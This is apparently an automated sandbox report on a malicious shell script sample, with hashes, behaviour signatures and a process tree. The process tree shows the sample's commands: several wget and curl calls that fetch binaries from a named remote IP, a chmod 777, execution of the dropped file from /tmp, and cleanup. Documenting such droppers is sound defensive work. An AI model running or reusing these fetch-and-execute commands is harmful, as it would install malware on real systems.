Analysis
-
max time kernel
2s -
max time network
4s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
18/10/2024, 01:49
Static task
static1
Behavioral task
behavioral1
Sample
5d9193c54c990112613dee4a02fb5a3f1ba4fd5fe69ccdd2a981daa8e3766b19.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
5d9193c54c990112613dee4a02fb5a3f1ba4fd5fe69ccdd2a981daa8e3766b19.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
5d9193c54c990112613dee4a02fb5a3f1ba4fd5fe69ccdd2a981daa8e3766b19.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
5d9193c54c990112613dee4a02fb5a3f1ba4fd5fe69ccdd2a981daa8e3766b19.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
5d9193c54c990112613dee4a02fb5a3f1ba4fd5fe69ccdd2a981daa8e3766b19.sh
-
Size
10KB
-
MD5
9a652a59ec3ea4f4b578b2c9f0e9c25c
-
SHA1
8c2b441f097c1f3c910ef9adb5b6816ddd60213b
-
SHA256
5d9193c54c990112613dee4a02fb5a3f1ba4fd5fe69ccdd2a981daa8e3766b19
-
SHA512
c68e93af48af16ba88fb94f6a8a874da524ac9fd19cb25abf57ac44b802ad1c202783ccdaca8d1876e6b4fcbec0b9f2080c1b06d78f60845281d78bb3b2b2216
-
SSDEEP
192:g3P87X+A6ZsXTqpx+PiAX0kvXTqpx73P87X6M0kXf:eA0YP5/
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 682 chmod -
Executes dropped EXE 1 IoCs
ioc pid Process /tmp/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq 683 oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq -
Checks CPU configuration 1 TTPs 1 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq curl
Processes
-
/tmp/5d9193c54c990112613dee4a02fb5a3f1ba4fd5fe69ccdd2a981daa8e3766b19.sh/tmp/5d9193c54c990112613dee4a02fb5a3f1ba4fd5fe69ccdd2a981daa8e3766b19.sh1⤵PID:649
-
/bin/rm/bin/rm bins.sh2⤵PID:652
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵PID:656
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:675
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵PID:680
-
-
/bin/chmodchmod 777 oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵
- File and Directory Permissions Modification
PID:682
-
-
/tmp/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq./oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵
- Executes dropped EXE
PID:683
-
-
/bin/rmrm oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵PID:684
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵PID:685
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97